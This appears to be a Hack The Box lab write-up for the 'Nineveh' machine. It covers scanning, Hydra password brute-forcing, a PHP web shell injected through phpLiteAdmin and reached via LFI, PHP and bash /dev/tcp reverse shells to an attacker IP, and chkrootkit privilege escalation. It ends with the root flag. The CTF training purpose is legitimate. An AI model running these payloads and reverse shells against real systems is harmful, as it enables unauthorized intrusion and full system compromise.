Nineveh - HackMD

# Nineveh ## enum ### nmap -sSCV ``` └─$ sudo nmap -sSCV 10.10.10.43 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-03 20:07 EDT Nmap scan report for 10.10.10.43 Host is up (0.18s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.18 (Ubuntu) 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Not valid before: 2017-07-01T15:03:30 |_Not valid after: 2018-07-01T15:03:30 |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.18 (Ubuntu) ``` -sU ``` └─$ sudo nmap -sU 10.10.10.43 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-03 20:05 EDT Nmap scan report for 10.10.10.43 Host is up (0.17s latency). All 1000 scanned ports on 10.10.10.43 are in ignored states. Not shown: 1000 open|filtered udp ports (no-response) Nmap done: 1 IP address (1 host up) scanned in 175.47 seconds ``` ### nikto ``` └─$ nikto -h 10.10.10.43 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.43 + Target Hostname: 10.10.10.43 + Target Port: 80 + Start Time: 2022-09-03 20:07:28 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server may leak inodes via ETags, header found with file /, inode: b2, size: 5535e4e04002a, mtime: gzip + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + /info.php: Output from the phpinfo() function was found. + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/ + 7864 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2022-09-03 20:32:17 (GMT-4) (1489 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` ### whatweb ``` └─$ whatweb 10.10.10.43 http://10.10.10.43 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.43] ``` ### search exploit (Apache 2.4.18) searchsploit ``` └─$ searchsploit apache 2.4.18 ---------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------- --------------------------------- Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Co | php/remote/29290.c Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execu | php/remote/29316.py Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'log | linux/local/46676.php Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remot | unix/remote/21671.c Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Rem | unix/remote/47080.c Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Rem | unix/remote/764.c Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Dir | linux/webapps/39642.txt Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | multiple/remote/6229.txt Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 | jsp/webapps/42966.py Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 | windows/webapps/42953.txt Apache Xerces-C XML Parser < 3.1.2 - Denial of Serv | linux/dos/36906.txt Webfroot Shoutbox < 2.32 (Apache) - Local File Incl | linux/remote/34.pl ---------------------------------------------------- --------------------------------- Shellcodes: No Results ``` #### priv esc - https://www.exploit-db.com/exploits/46676 #### rce - https://www.exploit-db.com/exploits/50406 ### gobuster ``` └─$ gobuster dir -u http://10.10.10.43/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x .php,.js,.html -z =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.43/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: js,html,php [+] Timeout: 10s =============================================================== 2022/09/03 20:06:49 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 178] [ERROR] 2022/09/03 20:07:12 [!] Get "http://10.10.10.43/info.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers) /server-status (Status: 403) [Size: 299] /department (Status: 301) [Size: 315] [--> http://10.10.10.43/department/] ``` https ``` └─$ gobuster dir -k -u https://10.10.10.43/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -z -x .php,.js,.html =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://10.10.10.43/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php,js,html [+] Timeout: 10s =============================================================== 2022/09/03 20:23:13 Starting gobuster in directory enumeration mode =============================================================== /db (Status: 301) [Size: 309] [--> https://10.10.10.43/db/] /index.html (Status: 200) [Size: 49] /server-status (Status: 403) [Size: 300] ``` ### web page http ![](https://i.imgur.com/FD7FWp1.png) https ![](https://i.imgur.com/Bon3LNF.jpg) http /department ![](https://i.imgur.com/r6x4eXd.png) https /db ![](https://i.imgur.com/Iq1jtyQ.png) ### brute force login #### http /department enter adnin and some pass then, error message is different like this other: invalid username admin: Invalid Password! so I guessed there is admin account this page has post request like this ``` POST /department/login.php HTTP/1.1 Host: 10.10.10.43 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 46 Origin: http://10.10.10.43 Connection: close Referer: http://10.10.10.43/department/login.php Cookie: PHPSESSID=hhliom4rceemu8orsh1iri2dj3 Upgrade-Insecure-Requests: 1 username=a&password=a ``` try password brute force using hydra ``` └─$ hydra -f -l admin -P /usr/share/wordlists/rockyou.txt -s 80 10.10.10.43 http-post-form '/department/login.php:username=^USER^&password=^PASS^:Invalid Password!' Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-03 21:02:00 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=^USER^&password=^PASS^:Invalid Password! [STATUS] 1013.00 tries/min, 1013 tries in 00:01h, 14343386 to do in 235:60h, 16 active [STATUS] 1010.67 tries/min, 3032 tries in 00:03h, 14341367 to do in 236:31h, 16 active [80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t [STATUS] attack finished for 10.10.10.43 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-03 21:06:35 ``` found the user and pass pair login: admin password: 1q2w3e4r5t login ![](https://i.imgur.com/2TcMAZO.png) but this page has no vuln #### https /db this page has post request like this ``` POST /db/index.php HTTP/1.1 Host: 10.10.10.43 Cookie: PHPSESSID=hhliom4rceemu8orsh1iri2dj3 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 52 Origin: https://10.10.10.43 Referer: https://10.10.10.43/db/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close password=a&remember=yes&login=Log+In&proc_login=true ``` try password bruteforce using hydra ``` └─$ hydra -f -l admin -P /usr/share/wordlists/rockyou.txt -s 443 10.10.10.43 https-post-form '/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.' Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-03 21:21:21 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password. [STATUS] 568.00 tries/min, 568 tries in 00:01h, 14343831 to do in 420:54h, 16 active [443][http-post-form] host: 10.10.10.43 login: admin password: password123 [STATUS] attack finished for 10.10.10.43 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-03 21:23:50 ``` found the password password: password123 login ![](https://i.imgur.com/3yGQCMB.png) this page looks interesting ### remote code executuion use this poc https://github.com/F-Masood/PHPLiteAdmin-1.9.3---Exploit-PoC create db ![](https://i.imgur.com/xOXk7vO.png) create table ![](https://i.imgur.com/Q5YpALb.png) add field (set default value `<?php system($_GET[cmd]?)>`) ![](https://i.imgur.com/Xb6q3z2.png) create ![](https://i.imgur.com/VuesWhW.png) access this with cmd parameter but can't exec command so I rename file name to ninevehNotes.txt.php http /department is that there seems to be a LFI here I have path to injected file`/var/tmp/ninevehNotes.txt.php` I access this url http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.php&cmd=ls ![](https://i.imgur.com/UwUmVat.png) I get ls command's result ### reverse shell I could rce. now, I get reverse shell this server is allow php script I run php rev shell command ``` php -r '$sock=fsockopen("10.10.14.9",12345);system("/bin/bash <&3 >&3 2>&3");' ``` listetn on kali using nc ``` └─$ sudo rlwrap nc -nlvp 1234 listening on [any] 1234 ... ``` get rev shell ``` └─$ sudo rlwrap nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 51400 whoami www-data id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` I send linpeas.sh and pspy at /tmp pspy result is interesting ``` 2022/09/04 03:06:04 CMD: UID=0 PID=1864 | /bin/sh /usr/bin/chkrootkit 2022/09/04 03:06:04 CMD: UID=0 PID=1863 | /bin/sh /usr/bin/chkrootkit 2022/09/04 03:06:04 CMD: UID=0 PID=1866 | 2022/09/04 03:06:04 CMD: UID=0 PID=1869 | /bin/sh /usr/bin/chkrootkit 2022/09/04 03:06:04 CMD: UID=0 PID=1868 | grep -E ^tcp 2022/09/04 03:06:04 CMD: UID=0 PID=1867 | /bin/sh /usr/bin/chkrootkit ``` running chkrootkit on root privilege search chkrootkit exploit ``` └─$ searchsploit chkrootkit ---------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------- --------------------------------- Chkrootkit - Local Privilege Escalation (Metasploit | linux/local/38775.rb Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt ---------------------------------------------------- --------------------------------- ``` use this poc(linux/local/33899.txt) read this poc, I found step ``` Steps to reproduce: - Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously) - Run chkrootkit (as uid 0) ``` 1. create file which name is update 2. write rev shell command in this file ``` #!/bin/bash /bin/bash -i >& /dev/tcp/10.10.14.9/12345 0>&1 ``` 3. listen rev shell using nc command on port 12345 ``` └─$ rlwrap nc -nlvp 12345 listening on [any] 12345 ... ``` 4. get root shell ``` └─$ rlwrap nc -nlvp 12345 listening on [any] 12345 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 49378 bash: cannot set terminal process group (14307): Inappropriate ioctl for device bash: no job control in this shell id id uid=0(root) gid=0(root) groups=0(root) whoami whoami root ``` ### get root.txt ``` cat root.txt 60e356c675cf5c59598329389b1d6dc3 ```